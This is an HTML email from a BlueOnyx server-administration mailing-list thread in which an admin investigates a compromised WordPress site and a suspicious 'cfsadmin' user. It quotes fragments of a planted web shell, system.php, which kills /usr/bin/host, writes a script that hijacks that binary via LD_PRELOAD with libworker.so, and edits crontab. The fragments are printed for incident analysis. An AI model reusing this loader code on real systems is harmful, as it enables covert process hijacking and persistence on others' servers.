<div dir="ltr">OK here is the hack<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall -9 ".basename("<b>/usr/bin/host</b>"));<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f = fopen("/usr/bin/host", "rb");<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("<b>/usr/bin/host</b>");<br>
/home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh",
 "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 
$HBN;export AU='".$AU."'\nexport 
LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab 
-l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");<br></div><div class="gmail_extra"><br><div class="gmail_quote">On Sat, Jun 27, 2015 at 11:21 AM, Gerald Waugh <span dir="ltr"><<a href="mailto:gwaugh@frontstreetnetworks.com" target="_blank">gwaugh@frontstreetnetworks.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><span class=""><br>
On 06/27/2015 10:51 AM, Michael Stauber wrote:<br>
</span><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
Hi Gerald,<br>
<br><span class="">
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
caching file system admin ???<br>
</blockquote></span>
That's not a standard component of any BlueOnyx version and it's also<br>
not in the 5106R or CentOS5 yum repositories.<br>
<br>
Find out where the binary for that is located:<br>
<br>
which cfsadmin<br>
<br>
Or use "find" for that if "which" doesn't find it.<br>
<br>
Then check which RPM that binary came from:<br>
<br>
rpm -q --whatprovides <path-of-binary><br>
<br>
That tells you the name of the RPM that it came from. If any.<br>
<br>
If you get an RPM name, you can run "yum info <rpm-name>" on it to see<br>
what info the system has about that RPM.<br>
</blockquote>
Not running now so which showed no results<br>
But found this with locate<br>
<br>
/home/.sites/137/site42/.users/26/cfsadmin<br>
/home/.sites/137/site42/.users/26/cfsadmin/.bash_logout<br>
/home/.sites/137/site42/.users/26/cfsadmin/.bash_profile<br>
/home/.sites/137/site42/.users/26/cfsadmin/.bashrc<br>
/home/.sites/137/site42/.users/26/cfsadmin/.gnome2<br>
/home/.sites/137/site42/.users/26/cfsadmin/Network Trash Folder<br>
/home/.sites/137/site42/.users/26/cfsadmin/Private<br>
/home/.sites/137/site42/.users/26/cfsadmin/dead.letter<br>
/home/.sites/137/site42/.users/26/cfsadmin/mbox<br>
/home/.sites/137/site42/.users/26/cfsadmin/web<br>
/home/.sites/137/site42/users/cfsadmin<br>
<br>
<br>
<br>
</blockquote></div><br><br clear="all"><div><br></div>-- <br><div class="gmail_signature">Gerald Waugh<br><a href="http://www.frontstreetnetworks.com" target="_blank">www.frontstreetnetworks.com</a><br>(318) 734-4779<br></div>
</div>